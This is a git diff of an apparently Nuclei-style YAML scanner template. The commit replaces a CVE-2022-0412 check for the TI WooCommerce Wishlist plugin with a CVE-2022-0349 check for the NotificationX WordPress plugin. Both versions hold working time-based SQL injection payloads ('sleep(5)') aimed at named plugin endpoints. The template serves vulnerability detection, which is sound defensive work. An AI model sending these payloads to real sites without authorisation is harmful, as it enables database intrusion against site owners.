parent
3517adc985
commit
1baf1e9f04
|
@ -1,25 +1,27 @@
|
||||||
id: CVE-2022-0412
|
id: CVE-2022-0349
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: TI WooCommerce Wishlist WP plugin < 1.40.1 - SQL Injection
|
name: NotificationX WordPress plugin < 2.3.9 - SQL Injection
|
||||||
author: edoardottt
|
author: edoardottt
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks.
|
The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682
|
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
|
||||||
- https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0349
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0412
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0349
|
||||||
classification:
|
classification:
|
||||||
cve-id: CVE-2022-0412
|
cve-id: CVE-2022-0349
|
||||||
metadata:
|
tags: cve,notificationx,wordpress,wordpressplugin,sqli,cve2022
|
||||||
verified: true
|
|
||||||
tags: cve,cve2022,woocommerce,wordpress,wp-plugin,wp,sqli
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g"
|
POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
nx_id%3Dsleep(5)%20--%20x
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -27,11 +29,6 @@ requests:
|
||||||
dsl:
|
dsl:
|
||||||
- 'duration>=5'
|
- 'duration>=5'
|
||||||
|
|
||||||
- type: word
|
|
||||||
part: body
|
|
||||||
words:
|
|
||||||
- 'Product not found'
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 400
|
- 200
|
||||||
|
|
Loading…
Reference in New Issue